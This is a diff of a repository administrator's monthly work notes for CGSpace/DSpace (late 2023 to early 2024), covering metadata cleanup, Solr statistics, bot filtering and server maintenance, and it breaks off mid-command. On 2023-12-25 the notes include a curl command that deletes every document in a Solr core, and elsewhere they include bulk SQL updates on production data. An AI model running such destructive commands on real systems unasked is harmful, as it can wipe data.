## 2023-09-30
- Export CGSpace to check for missing Initiative collection mappings
- Still working on checking Unpaywall for access rights and licenses for our DOIs
- Regarding Unpaywall's "evidence" metadata about whether an item is open access or not, after looking at dozens of items manually:
- evidence: "oa journal (via doaj)" <---- yes
- evidence: "open (via free article)" <---- hmmm, not always correct
- evidence: "open (via page says license)" <--- noooo, can't rely on that
- evidence: "open (via page says Open Access)" <---- yes...?
- evidence: "open (via free pdf)" <---- hmmm, not always correct
- evidence: "oa journal (via publisher name)" <---- noooo
- I updated access status for about four hundred more items based on this, and licenses for a dozen or so
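- A trivial sketch of how I'd encode that judgement when processing Unpaywall responses (the evidence strings are the ones above; which ones to trust is my own assessment, not Unpaywall's):
```python
# Sketch: only trust certain Unpaywall "evidence" values when updating access rights.
TRUSTED_EVIDENCE = {
    "oa journal (via doaj)",
    "open (via page says Open Access)",
}

def is_trustworthy(evidence: str) -> bool:
    return evidence in TRUSTED_EVIDENCE

print(is_trustworthy("oa journal (via publisher name)"))  # False
```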
<!-- vim: set sw=2 ts=2: -->

150
content/posts/2023-10.md Normal file
View File

@ -0,0 +1,150 @@
---
title: "October, 2023"
date: 2023-10-02T09:05:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-10-02
- Export CGSpace to check DOIs against Crossref
- I found that [Crossref's metadata is in the public domain under the CC0 license](https://www.crossref.org/documentation/retrieve-metadata/rest-api/rest-api-metadata-license-information/)
- One interesting thing is the abstracts, which are copyrighted by the copyright owner, meaning Crossref cannot waive the copyright under the terms of the CC0 license, because it is not theirs to waive
- We can be on the safe side by using only abstracts for items that are licensed under Creative Commons
<!--more-->
- This GREL extracts the _text_ content of the `<jats:p>` tags (ie, no other JATS XML markup tags like `<jats:i>`, `<jats:sub>`, etc):
```console
forEach(value.parseXml().select("jats|p"),i,i.xmlText()).join("")
```
- Note that we need to use `select("jats|p")` instead of `select("jats:p")` for OpenRefine's parseXml, and we need to `join()` on the end
- I updated metadata for about 3,000 items using Crossref metadata
- I stripped trailing periods for titles where they were missing on the Crossref titles
- I copied abstracts for about 600 items that were missing them, for items that were Creative Commons
- I updated publishers for a few thousand more where ours and Crossref disagreed, checking a handful manually first
- I also added subjects to the `crossref_doi_lookup.py` script to see if they will be useful for us
- When checking with csv-metadata-quality I can validate those subjects against AGROVOC and add them if they are valid
## 2023-10-03
- I added the item type to the collection subscription email on DSpace 6
- It's done differently on DSpace 7 so I'll have to see how to do it there...
- Test a patch that fixes a bug with item versioning disabled in DSpace 7
- I hadn't realized that DSpace 7 defaulted to versioning being enabled, whereas we never used this in DSpace 6 (yet)
- Submit [an issue regarding duplicate Discovery sort fields](https://github.com/DSpace/DSpace/issues/9104) in DSpace 7
## 2023-10-05
- Some discussion this week about issue and online dates for journal articles, with regards to PRMS
- I looked more closely at the [Crossref API docs](https://github.com/CrossRef/rest-api-doc/blob/master/api_format.md) and realized (again) that their "issue" date is not the same as our issue date—they take the earlier of the print and online dates!
- Also, *very many* items have no print date at all, perhaps due to delays, errors, or simply because the journal is "online only"!
- I suggested again that PRMS should consider both, and take the earlier of the two, then make sure whether the date is in the current reporting period
- I managed to find 80 items with print publishing dates from 2023 and updated those from Crossref, but for the rest we will have to think about how we handle them
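- A tiny sketch of the "take the earlier of the two dates" logic I keep suggesting (the function and field names are illustrative):
```python
# Sketch: pick the earlier of Crossref's print and online publication dates.
from datetime import date

def earliest_date(print_date, online_date):
    dates = [d for d in (print_date, online_date) if d is not None]
    return min(dates) if dates else None

print(earliest_date(date(2023, 3, 1), date(2022, 7, 15)))  # 2022-07-15
```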
## 2023-10-06
- More discussion about dates after looking closely at them yesterday and today
- Crossref doesn't always have both issued and online dates—sometimes they have one, sometimes the other, and sometimes both, so we cannot rely on them 100% for that.
- In some cases, the item is available online for months (or even a year!), but has not been included in an issue yet, and thus has no "issue" date, for example:
- https://doi.org/10.1002/csc2.20914 <--- published online January 2023!
- https://doi.org/10.1111/mcn.13401 <--- published online July 2022!
- Even journals make mistakes: this journal article was "issued" in 2022, but online in 2023! This is not Crossref's fault, but the journal's!
- https://doi.org/10.1186/s40066-022-00400-6
- I found a bunch more strange cases regarding dates and recommended to PRMS team that they use the earlier of the issued and online dates
- Meet with Aditi to start discussing the scope of knowledge products we can get for the CGIAR climate change synthesis
## 2023-10-07
- I spent a few hours (!) debugging an issue in Python when downloading PDFs
- I think it ended up being due to `requests_cache`!!! Grrrr
- On a positive note I've greatly refactored my script for discovering and downloading PDFs from Unpaywall
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-10-08
- Starting to see some stuck locks on CGSpace this morning
- I will give notice and restart CGSpace
- Work on Python script to harvest DSpace REST API and save to CSV
## 2023-10-11
- File an issue on the DSpace issue tracker regarding the MaxMind JSON objects in our Solr statistics: https://github.com/DSpace/DSpace/issues/9118
## 2023-10-12
- Discuss MODS issues in CGSpace's OAI-PMH with Stefano and Valentina
- AGRIS can currently only support MODS 3.7 so they need us to roll our 3.8 work from 2023-06 back down, which requires some minor changes to the crosswalk
## 2023-10-13
- I did some more minor work to get the MODS 3.7 changes ready for AGRIS on DSpace Test
## 2023-10-14
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
- I deployed the AGRIS changes for OAI-PMH on CGSpace
## 2023-10-16
- Fix some typos in ILRI subjects on CGSpace
- These were affecting the taxonomy on ilri.org
- I exported CGSpace and did some validation and cleanup on ILRI subjects, moving some to AGROVOC subjects
- Port the MODS 3.7 crosswalk from DSpace 6 to DSpace 7
- It works fine, we only need to take note that the OAI-PMH endpoint is now relative to the `/server` path instead of a dedicated OAI path
## 2023-10-17
- Export CGSpace to do some cleanups all over on invalid metadata values
- I found many metadata values in the wrong field, wrong format, etc
- This ended up being cleanups for 694 items
## 2023-10-20
- Export CGSpace to check for missing Initiative collection mappings
- I also did a run of looking up all Initiative outputs with DOIs against Crossref to check for missing dates, publishers, etc
- I found issued dates for a few, and online dates for over 100
- I also fixed some incorrect licenses, access status, and abstracts
## 2023-10-23
- Export a list of Internal Documents for Peter to review to see if we can re-classify some
- Peter sent changes for 740 items so I applied them on CGSpace
- Testing the changes for OpenRXV DSpace 7 compatibility
## 2023-10-24
- Sync DSpace 7 Test with a fresh CGSpace snapshot
- Meeting with FARA to discuss DSpace training and support
- Meeting with IFPRI about migrating to CGSpace
## 2023-10-25
- Maria was asking about an error deleting an item in the Alliance community
- The error was "Authorization denied for action OBSOLETE (DELETE) on BITSTREAM:..."
- According to my notes this error happened a few times in the past and is some kind of corner case regarding permissions
- I deleted the item for her
- I deleted a handful of old CRP groups on CGSpace
## 2023-10-27
- Peter sent me a list of journal articles from Altmetric that have an ILRI affiliation, but no Handle
- I used my `crossref_doi_lookup.py` script to fetch the metadata for them using their DOIs, then did a bunch of cleanup in OpenRefine
- Test some LDAP patches for DSpace 7
## 2023-10-30
- Some work on metadata for Aditi's review
- I found more preprints grrrr
## 2023-10-31
- Peter got back to me with the cleanups on ILRI journal articles from Altmetric that we didn't have on CGSpace
- I did another duplicate check and found four more duplicates that had been uploaded yesterday
- Then I did a quick sanity check and uploaded the remaining 19 items to CGSpace
<!-- vim: set sw=2 ts=2: -->

215
content/posts/2023-11.md Normal file
View File

@ -0,0 +1,215 @@
---
title: "November, 2023"
date: 2023-11-02T12:59:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-11-01
- Work a bit on the ETL pipeline for the CGIAR Climate Change Synthesis
- I improved the filtering and wrote some Python using pandas to merge my sources more reliably
## 2023-11-02
- Export CGSpace to check missing Initiative collection mappings
- Start a harvest on AReS
<!--more-->
- IFPRI contacted us about importing their Slideshare presentations to CGSpace
- There are ~1,700 of them and date back to as early as 2008
- I did a quick cleanup of the metadata export from Slideshare (including tagging with some AGROVOC in OpenRefine) and uploaded to DSpace Test
## 2023-11-03
- A little bit of work on the CGIAR Climate Change Synthesis
- Discuss some CGSpace migration plans with Leigh from IFPRI
- For their Slideshare content we agreed:
- Exclude private
- Exclude deleted
- Exclude non presentation types
- Exclude duplicates within the collection for now until we can sort them out
- That leaves about 1,500 items out of the 1,700
- I did a duplicate check against CGSpace and found 44 items with 1.0 similarity so I removed those
## 2023-11-04
- Export CGSpace to check for missing Initiative collection mappings
- I ran through the list of potential duplicates on the IFPRI Slideshare presentations
## 2023-11-05
- Work with Salem to migrate AReS to the new version
## 2023-11-07
- DSpace 7 Test went down and there is very high load on the server
- I saw very high load from Java but didn't have time to check exactly what was wrong so I just rebooted the host
- A few hours after restarting the system went down again, with very high load from Java again
- I see lots of messages like this in the Tomcat log:
```
tomcat9[732]: [9955.662s][info ][gc] GC(6291) Pause Full (G1 Compaction Pause) 4085M->4080M(4096M) 677.251ms
tomcat9[732]: [9955.662s][info ][gc] GC(6290) Concurrent Mark Cycle 677.558ms
tomcat9[732]: [9955.666s][info ][gc] GC(6292) To-space exhausted
```
- I see some messages in `dspace.log` about heap space:
```
Caused by: java.lang.OutOfMemoryError: Java heap space
```
- I will increase Tomcat's heap from 4096m to 5120m
- A few hours later it happened again, so I increased the heap from 5120m to 6144m
- Not sure what's going on today...
- I tested moving the CGIAR Fund Council community to the CGIAR historic archive on DSpace Test:
```console
$ dspace community-filiator -r -p 10568/83389 -c 10947/2516
$ dspace community-filiator -s -p 10947/2515 -c 10947/2516
$ dspace index-discovery -r 10947/2516
$ dspace index-discovery -r 10947/2515
$ dspace index-discovery -r 10568/83389
$ dspace index-discovery
```
- I think this is the minimal we can do to avoid a full Discovery reindex which is very expensive
- I helped Maria resize some massive PDFs for upload to CGSpace using GhostScript prepress mode, as I had done before in [September, 2023]({{< relref "2023-09.md" >}})
## 2023-11-08
- DSpace 7 Test has very high load again and I see more Java heap space errors in the log
```console
# grep -c 'Caused by: java.lang.OutOfMemoryError: Java heap space' /home/dspace7/log/dspace.log-2023-11-07
35
# grep -c 'Caused by: java.lang.OutOfMemoryError: Java heap space' /home/dspace7/log/dspace.log
7
```
- I don't know what is happening... I will increase the heap size from 6144m to 7168m again...
- I did some work on the value mappings in AReS
- I wanted to test the import/export feature, and found that I could get a JSON and convert it to CSV for manipulation in OpenRefine
- Importing duplicates the records, so I deleted and re-created the index in Elasticsearch first
- Then I started a new harvest on AReS to make sure the mappings are applied
## 2023-11-09
- Ryan asked me for help uploading a large PDF to CGSpace
- I tried my usual GhostScript prepress invocation and found the size decreased significantly, but some minor artifacts appeared in the images
- Interestingly, the [GhostScript docs](https://ghostscript.com/docs/9.54.0/VectorDevices.htm) mention that `prepress` doesn't give the best results:
> Please be aware that the /prepress setting does not indicate the highest quality conversion. Using any of these presets will involve altering the input, and as such may result in a PDF of poorer quality (compared to the input) than simply using the defaults. The 'best' quality (where best means closest to the original input) is obtained by not setting this parameter at all (or by using /default).
- Also, I found [a question on StackOverflow discussing some further techniques for PDFs with images](https://stackoverflow.com/questions/40849325/ghostscript-pdfwrite-specify-jpeg-quality):
```console
$ gs -sOutputFile=137166-default-dct.pdf -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dNOPAUSE -dBATCH -dPDFSETTINGS=/default -c "<< /ColorACSImageDict << /VSamples [ 1 1 1 1 ] /HSamples [ 1 1 1 1 ] /QFactor 0.08 /Blend 1 >> /ColorImageDownsampleType /Bicubic /ColorConversionStrategy /LeaveColorUnchanged >> setdistillerparams" -f 137166.pdf
```
- This looks much better, and is still much smaller than the original
- Also, I used `pdfimages` to extract all the images from the original and the one above and found:
```console
$ du -sh images-*
886M images-default-dct
1012M images-original
```
- And from [WeCompress's analysis](https://www.wecompress.com/en/analyze) I see that the images are 85% of the size of the PDF
## 2023-11-10
- I finished checking the IFPRI Slideshare records and added some tagging of countries, regions, and CRPs and then uploaded them to CGSpace
## 2023-11-11
- Salem fixed a bug on OpenRXV that was splitting country values by "," before matching them with ISO countries
- I exported CGSpace to check for missing Initiative collection mappings
- Start a fresh harvest on AReS
## 2023-11-16
- Discuss mapping ICARDA outputs from Initiatives to ICARDA collections on CGSpace
- I added MEL's CGSpace user to the administrator group of a handful of collections
- I also did a batch mapping of 274 existing Initiative outputs from ICARDA to the relevant collections
## 2023-11-18
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-11-22
- I was checking out the [DSpace 7 statistics](https://github.com/DSpace/RestContract/blob/main/statistics-reports.md) again and found that we have total visits and total downloads for each DSpace object, for example [this item](https://dspace7test.ilri.org/items/3f1b9605-f5ff-4bbb-8c89-d6fe4157f748):
- TotalVisits: https://dspace7test.ilri.org/server/api/statistics/usagereports/3f1b9605-f5ff-4bbb-8c89-d6fe4157f748_TotalVisits
- TotalDownloads: https://dspace7test.ilri.org/server/api/statistics/usagereports/3f1b9605-f5ff-4bbb-8c89-d6fe4157f748_TotalDownloads
- And the numbers match those in my dspace-statistics-api *exactly*!
- This can be useful to get an individual DSpace object's stats, but there is no way to iterate over all objects like all items...
- We can look at using this to draw stats on the community, collection, and item pages
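- A sketch of pulling those two reports for a given UUID (the endpoints are from the RestContract page above; the `points`/`values` structure of the response is an assumption based on what I saw on DSpace 7 Test):
```python
# Sketch: fetch TotalVisits and TotalDownloads usage reports for one DSpace object.
import requests

UUID = "3f1b9605-f5ff-4bbb-8c89-d6fe4157f748"
BASE = "https://dspace7test.ilri.org/server/api/statistics/usagereports"

for report in ("TotalVisits", "TotalDownloads"):
    r = requests.get(f"{BASE}/{UUID}_{report}")
    r.raise_for_status()
    points = r.json().get("points", [])
    total = sum(p.get("values", {}).get("views", 0) for p in points)
    print(report, total)
```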
## 2023-11-23
- Brian King was asking me how many PDFs we had in CGSpace so I got a rough estimate using this SQL query:
```console
localhost/dspace7= ☘ SELECT COUNT(uuid) FROM bitstream WHERE bitstream_format_id=(SELECT bitstream_format_id FROM bitstreamformatregistry WHERE mimetype='application/pdf');
count
───────
47818
(1 row)
```
- It's been some time since I looked at our Solr statistics to find new bots
- I found a few new ones that I [submitted to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/60) and added to our local bot list:
- GuzzleHttp/7
- Owler@ows.eu/1
- newspaperjs
- I ran my old `check-spider-hits.sh` script with a list of bots from our local overrides to purge hits from Solr:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 30 hits from ubermetrics in statistics
Purging 59 hits from curb in statistics
Purging 36 hits from bitdiscovery in statistics
Purging 87 hits from omgili in statistics
Purging 47 hits from Vizzit in statistics
Purging 109 hits from Java\/17-ea in statistics
Purging 40 hits from AdobeUxTechC4-Async in statistics
Purging 21 hits from ZaloPC-win32-24v473 in statistics
Purging 21 hits from nbertaupete95 in statistics
Purging 52 hits from Scoop\.it in statistics
Purging 16 hits from WebAPIClient in statistics
Purging 241 hits from RStudio in statistics
Purging 1255 hits from ^MEL in statistics
Purging 47850 hits from GuzzleHttp in statistics
Purging 8714 hits from Owler in statistics
Purging 1083 hits from newspaperjs in statistics
Purging 369 hits from ^Chrome$ in statistics
Purging 1474 hits from curl in statistics
Total number of bot hits purged: 61504
```
- I also noticed 35,000 requests over the past few years from lowercase user agents, which is [definitely weird](https://developers.whatismybrowser.com/api/features/user-agent-checks/weird/#all_lower_case), for example:
- `mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/89.0.4389.90 safari/537.36`
- `mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/90.0.4430.93 safari/537.36`
- I'm gonna add those to our overrides and purge them:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 35816 hits from ^mozilla in statistics
Total number of bot hits purged: 35816
```
## 2023-11-30
- Minor updates to our OAI MODS crosswalk
- Stefano found a minor markup issue with our alternative titles (`<titleInfo>` tag)
- Very high load on CGSpace since after lunch
- I killed some locks that had been stuck for a few hours
<!-- vim: set sw=2 ts=2: -->

271
content/posts/2023-12.md Normal file
View File

@ -0,0 +1,271 @@
---
title: "December, 2023"
date: 2023-12-01T08:48:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-12-01
- There is still high load on CGSpace and I don't know why
- I don't see a high number of sessions compared to previous days in the last few weeks
<!--more-->
```console
$ for file in dspace.log.2023-11-[23]*; do echo "$file"; grep -a -oE 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
dspace.log.2023-11-20
22865
dspace.log.2023-11-21
20296
dspace.log.2023-11-22
19688
dspace.log.2023-11-23
17906
dspace.log.2023-11-24
18453
dspace.log.2023-11-25
17513
dspace.log.2023-11-26
19037
dspace.log.2023-11-27
21103
dspace.log.2023-11-28
23023
dspace.log.2023-11-29
23545
dspace.log.2023-11-30
21298
```
- Even the number of unique IPs is not very high compared to the last week or so:
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.1 | sort | uniq | wc -l
17023
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.2.gz | sort | uniq | wc -l
17294
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.3.gz | sort | uniq | wc -l
22057
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.4.gz | sort | uniq | wc -l
32956
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.5.gz | sort | uniq | wc -l
11415
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.6.gz | sort | uniq | wc -l
15444
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.7.gz | sort | uniq | wc -l
12648
```
- It doesn't make any sense so I think I'm going to restart the server...
- After restarting the server the load went down to normal levels... who knows...
- I started trying to see how I'm going to generate the fake statistics for the Alliance bitstream that was replaced
- I exported all the statistics for the owningItem now:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/stats-export.json -f 'owningItem:b5862bfa-9799-4167-b1cf-76f0f4ea1e18' -k uid
```
- Importing them into DSpace Test didn't show the statistics in the Atmire module, but I see them in Solr...
## 2023-12-02
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-12-04
- Send a message to Altmetric support because the item IWMI highlighted last month still doesn't show the attention score for the Handle after I tweeted it several times weeks ago
- Spent some time writing a Python script to fix the literal MaxMind City JSON objects in our Solr statistics
- There are about 1.6 million of these, so I exported them using solr-import-export-json with the query `city:com*` but ended up finding many that have missing bundles, container bitstreams, etc:
```
city:com* AND -bundleName:[* TO *] AND -containerBitstream:[* TO *] AND -file_id:[* TO *] AND -owningItem:[* TO *] AND -version_id:[* TO *]
```
- (Note the negation to find fields that are missing)
- I don't know what I want to do with these yet
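- The city fix itself is mostly string surgery; a sketch of the idea (based on the example records from 2023-08-16; the real `fix_maxmind_stats.py` may differ):
```python
# Sketch: recover the plain English city name from a literal
# "com.maxmind.geoip2.record.City [ {...} ]" string in a Solr statistics document.
import json
import re

def fix_city(value):
    match = re.search(r"com\.maxmind\.geoip2\.record\.City \[ (\{.*\}) \]", value)
    if not match:
        return value
    record = json.loads(match.group(1))
    # Empty records like "City [ {} ]" simply become an empty string
    return record.get("names", {}).get("en", "")

print(fix_city('com.maxmind.geoip2.record.City [ {"geoname_id":1002145,"names":{"en":"George"}} ]'))
# -> George
```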
## 2023-12-05
- I finished the `fix_maxmind_stats.py` script and fixed 1.6 million records and imported them on CGSpace after testing on DSpace 7 Test
- Altmetric said there was a glitch regarding the Handle and DOI linking and they successfully re-scraped the item page and linked them
- They sent me a list of current production IPs and I notice that some of them are in our nginx bot network list:
```console
$ for network in $(csvcut -c network /tmp/ips.csv | sed 1d | sort -u); do grepcidr $network ~/src/git/rmg-ansible-public/roles/dspace/files/nginx/bot-networks.conf; done
108.128.0.0/13 'bot';
46.137.0.0/16 'bot';
52.208.0.0/13 'bot';
52.48.0.0/13 'bot';
54.194.0.0/15 'bot';
54.216.0.0/14 'bot';
54.220.0.0/15 'bot';
54.228.0.0/15 'bot';
63.32.242.35/32 'bot';
63.32.0.0/14 'bot';
99.80.0.0/15 'bot'
```
- I will remove those for now so that Altmetric doesn't have any unexpected issues harvesting
## 2023-12-08
- Finalized the script to generate Solr statistics for the Alliance researcher Mirjam
- The script is `ilri/generate_solr_statistics.py`
- I generated ~3,200 statistics based on her records of the download statistics of [that item](https://hdl.handle.net/10568/131997) and imported them on CGSpace
- Did some work on the DSpace 7 submission form
- Peter asked for lists of affiliations, investors, and publishers to do some cleanups
- I generated a list from a CSV export instead of doing it based on a SQL dump...
```console
$ csvcut -c 'cg.contributor.affiliation[en_US]' /tmp/initiatives.csv \
| sed -e 1d -e 's/^"//' -e 's/"$//' -e 's/||/\n/g' -e '/^$/d' \
| sort | uniq -c | sort -hr \
| awk 'BEGIN { FS = "^[[:space:]]+[[:digit:]]+[[:space:]]+" } {print $2}'\
| sed -e '1i cg.contributor.affiliation' -e 's/^\(.*\)$/"\1"/' \
> /tmp/2023-12-08-initiatives-affiliations.csv
```
- Export a list of authors as well:
```console
localhost/dspace7= ☘ \COPY (SELECT DISTINCT text_value AS "dc.contributor.author", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 3 GROUP BY "dc.contributor.author" ORDER BY count DESC) to /tmp/2023-12-08-authors.csv WITH CSV HEADER;
COPY 102435
```
## 2023-12-11
- Work on OpenRXV dependencies and podman a bit
- Peter noticed that the statistics for this month are very very low on CGSpace
- I don't know what is going on, perhaps it is related to me adjusting the nginx config last week?
- Ah, it's probably because of the spider patterns I updated on 2023-11
## 2023-12-16
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-12-17
- Pull latest master branch for OpenRXV and deploy on the server
- I threw away some changes in the tree regarding the Angular base ref, and it broke AReS
- So note to self: we need to set the base ref in `frontend/Dockerfile` before building!
- Now Salem fixed the country map
## 2023-12-18
- Work a bit on the IFPRI-ISNAR archive from Leigh
- More work on the DSpace 7 home page
## 2023-12-19
- More work on the DSpace 7 home page
- The Alliance TIP team is testing deposits to the DSpace 7 REST API and getting an HTTP 500 error
- In the DSpace logs I see this after they log in, create the item, and update the metadata:
```
2023-12-19 17:49:28,022 ERROR unknown unknown org.dspace.rest.Resource @ Something get wrong. Aborting context in finally statement.
```
- I found some messages on the dspace-tech mailing list suggesting this might be an old bug: https://groups.google.com/g/dspace-tech/c/My1GUFYFGoU/m/tS7-WAJPAwAJ
- I restarted Tomcat and told the Alliance TIP team to try again
## 2023-12-20
- The Alliance guys said that submitting via REST works now... sigh, so that's just some old DSpace 5/6 REST API bug
- I lowercased all our AGROVOC keywords in `dcterms.subject` in SQL:
```console
dspace=# BEGIN;
BEGIN
dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
UPDATE 462
dspace=*# COMMIT;
COMMIT
```
## 2023-12-25
- Looking into [Solr backups](https://solr.apache.org/guide/8_11/making-and-restoring-backups.html)
- Since we are not running in Solr Cloud mode we need to use the replication endpoint for Solr standalone
- This works:
```console
$ curl 'http://localhost:8983/solr/statistics/replication?command=backup'
{
  "responseHeader":{
    "status":0,
    "QTime":26},
  "status":"OK"}
```
- Then I saw the size of the snapshot reach the size of the index...
```console
# du -sh /var/solr/data/configsets/statistics/data/*
22G /var/solr/data/configsets/statistics/data/index
16G /var/solr/data/configsets/statistics/data/snapshot.20231225074111671
4.0K /var/solr/data/configsets/statistics/data/snapshot_metadata
# du -sh /var/solr/data/configsets/statistics/data/*
22G /var/solr/data/configsets/statistics/data/index
20G /var/solr/data/configsets/statistics/data/snapshot.20231225074111671
4.0K /var/solr/data/configsets/statistics/data/snapshot_metadata
# du -sh /var/solr/data/configsets/statistics/data/*
22G /var/solr/data/configsets/statistics/data/index
21G /var/solr/data/configsets/statistics/data/snapshot.20231225074111671
4.0K /var/solr/data/configsets/statistics/data/snapshot_metadata
# du -sh /var/solr/data/configsets/statistics/data/*
22G /var/solr/data/configsets/statistics/data/index
22G /var/solr/data/configsets/statistics/data/snapshot.20231225074111671
4.0K /var/solr/data/configsets/statistics/data/snapshot_metadata
```
- Then I deleted the core and restored from the snapshot backup:
```console
$ curl http://localhost:8983/solr/statistics/update -H "Content-type: text/xml" --data-binary '<delete><query>*:*</query></delete>'
$ curl http://localhost:8983/solr/statistics/update -H "Content-type: text/xml" --data-binary '<commit />'
$ curl 'http://localhost:8983/solr/statistics/replication?command=restore&name=statistics'
```
- Interestingly the import worked fine, but created a new data index:
```console
# du -sh /var/solr/data/configsets/statistics/data/*
4.0K /var/solr/data/configsets/statistics/data/index.properties
22G /var/solr/data/configsets/statistics/data/restore.20231225154626463
4.0K /var/solr/data/configsets/statistics/data/snapshot_metadata
22G /var/solr/data/configsets/statistics/data/snapshot.statistics
```
- Not sure the implications of that—Solr uses the data just fine
- I can surely use this for atomic Solr backups
## 2023-12-27
- Delete duplicate metadata as described in my DSpace issue from last year: https://github.com/DSpace/DSpace/issues/8253
- Do some other metadata cleanups on CGSpace
- I also looked up our DOIs on Crossref to get some missing abstracts and correct licenses and dates
- Some minor work on the CGSpace DSpace 7 theme to fix the navbar on mobile
- Some work on the IFPRI ISNAR archive
## 2023-12-28
- I started porting the [cgspace-java-helpers](https://github.com/ilri/cgspace-java-helpers) to DSpace 7
- Some work on the IFPRI ISNAR archive
- I ended up going through most of the PDFs to get better dates and abstracts
## 2023-12-29
- I created a new Hetzner server to replace the current DSpace 6 CGSpace next week when we migrate to DSpace 7
- Interesting, I haven't checked for content pointing to legacy domains in several years (!)
- `inurl:mahider.cgiar.org`: 0 results on Google!
- `inurl:mahider.ilri.org`: 2,100 results on Google
- `inurl:mahider.ilri.org inurl:https`: 2 results on Google (!)
- `inurl:dspace.ilri.org`: 1,390 results on Google
- `inurl:dspace.ilri.org inurl:https`: 0 results on Google (!)
- So it seems I can do away with the HTTPS virtual hosts finally
- Well my current certificates expired on 2021-02-13 and nobody noticed... so...
<!-- vim: set sw=2 ts=2: -->

430
content/posts/2024-01.md Normal file

@ -0,0 +1,430 @@
---
title: "January, 2024"
date: 2024-01-02T10:08:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-01-02
- Work on preparation of new server for DSpace 7 migration
- I'm not quite sure what we need to do for the Handle server
- For now I just ran the `dspace make-handle-config` script and diffed it with the one from DSpace 6
- I sent the bundle to the Handle admins to make sure it's OK before we do the migration
- Continue testing and debugging the cgspace-java-helpers on DSpace 7
- Work on IFPRI ISNAR archive cleanup
<!--more-->
## 2024-01-03
- I haven't heard from the Handle admins so I'm preparing a backup solution using nginx streams
- This seems to work in my simple tests (this must be outside the `http {}` block):
```
stream {
    upstream handle_tcp_9000 {
        server 188.34.177.10:9000;
    }

    server {
        listen 9000;
        proxy_connect_timeout 1s;
        proxy_timeout 3s;
        proxy_pass handle_tcp_9000;
    }
}
```
- Here I forwarded TCP port 9000 from one server to another and was able to retrieve a test HTML page that was being served on the target
- I will have to do TCP and UDP on port 2641, and TCP/HTTP on port 8000.
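- Something like this is what I have in mind for the real ports (an untested sketch, assuming the same upstream host; port 8000 can stay in the normal `http {}` block as a plain `proxy_pass`):
```
stream {
    upstream handle_tcp_2641 {
        server 188.34.177.10:2641;
    }

    server {
        listen 2641;
        proxy_pass handle_tcp_2641;
    }

    server {
        listen 2641 udp;
        proxy_pass handle_tcp_2641;
    }
}
```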
- I did some more minor work on the IFPRI ISNAR archive
- I got some PDFs from the UMN AgEcon search and fixed some metadata
- Then I did some duplicate checking and found five items already on CGSpace
## 2024-01-04
- Upload 692 items for the ISNAR archive to CGSpace: https://cgspace.cgiar.org/handle/10568/136192
- Help Peter proof and upload 252 items from the 2023 Gender conference to CGSpace
- Meeting with IFPRI to discuss their migration to CGSpace
- We agreed to add two new fields, one for IFPRI project and one for IFPRI publication ranking
- Most likely we will use `cg.identifier.project` as a general field and consolidate other project fields there
- Not sure which field to use for the publication rank...
## 2024-01-05
- Proof and upload 51 items in bulk for IFPRI
- I did a big cleanup of user groups in anticipation of complaints about slow workflow tasks etc in DSpace 7
- I removed ILRI editors from all the dozens of CCAFS community and collection groups, and I should do the same for other CRPs since they have been closed for two years now
## 2024-01-06
- Migrate CGSpace to DSpace 7
## 2024-01-07
- High load on the server and UptimeRobot saying the frontend is flapping
- I noticed tons of logs from pm2 in the systemd journal, so I disabled those in the systemd unit because they are available from pm2's log directory anyway
- I also noticed the same for Solr, so I disabled stdout for that systemd unit as well
- I spent a lot of time bringing back the nginx rate limits we used in DSpace 6 and it seems to have helped
- I see some client doing weird HEAD requests to search pages:
```
47.76.35.19 - - [07/Jan/2024:00:00:02 +0100] "HEAD /search/?f.accessRights=Open+Access%2Cequals&f.actionArea=Resilient+Agrifood+Systems%2Cequals&f.author=Burkart%2C+Stefan%2Cequals&f.country=Kenya%2Cequals&f.impactArea=Climate+adaptation+and+mitigation%2Cequals&f.itemtype=Brief%2Cequals&f.publisher=CGIAR+System+Organization%2Cequals&f.region=Asia%2Cequals&f.sdg=SDG+12+-+Responsible+consumption+and+production%2Cequals&f.sponsorship=CGIAR+Trust+Fund%2Cequals&f.subject=environmental+factors%2Cequals&spc.page=1 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.2504.63 Safari/537.36"
```
- I will add their network blocks (AS45102) and regenerate my list of bot networks:
```console
$ wget https://asn.ipinfo.app/api/text/list/AS16276 \
https://asn.ipinfo.app/api/text/list/AS23576 \
https://asn.ipinfo.app/api/text/list/AS24940 \
https://asn.ipinfo.app/api/text/list/AS13238 \
https://asn.ipinfo.app/api/text/list/AS14061 \
https://asn.ipinfo.app/api/text/list/AS12876 \
https://asn.ipinfo.app/api/text/list/AS55286 \
